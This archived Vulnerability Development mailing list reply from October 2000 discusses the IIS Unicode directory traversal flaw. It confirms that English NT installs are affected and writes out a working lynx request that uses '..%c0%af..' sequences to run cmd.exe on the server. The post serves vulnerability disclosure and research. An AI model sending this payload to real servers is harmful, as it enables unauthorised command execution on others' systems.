Vulnerability Development mailing list archives

Re: IIS and unicode


From: "Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>
Date: Wed, 25 Oct 2000 10:49:57 -0400

In the profound words of aliver vilereal:

ok,
is it true that the unicode exploit only works under foreign machines
that use 2-byte characters?  if so, how can i check (in a http response)
if this is a vulnerable system.  i have heard that english systems are
also vulnerable, but require a different string to be passed to them, is
this true?

        No, it's NOT just foreign versions...  I tested an NT machine
we have at work (standard US/English NT/IIS install; I'm not sure
about versions/patchlevels; I'm not an MS guy, at all), and I was
easily able to run arbitrary commands on it...  The only char sequence
I tried was "%c0%af"...  I'm not sure if others might work, as well...
Specifically, this worked perfectly (done from a Unix box, of course):

lynx -dump 'http://NTServerNameHere/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\'

        Also, replacing "msadc" with "scripts" or "cgi-bin" works
just as well...  (Seemingly any valid, accessible subdir off
the web root? *shrug*)

--
||========================================================================||
||    Rob Seace    ||               URL              || ras () magrathea com ||
||  AKA: Agrajag   || http://www.magrathea.com/~ras/ || rob () wordstock com ||
||========================================================================||
"The secret of healthy hitchhiking is to eat junk food." - TRATEOTU

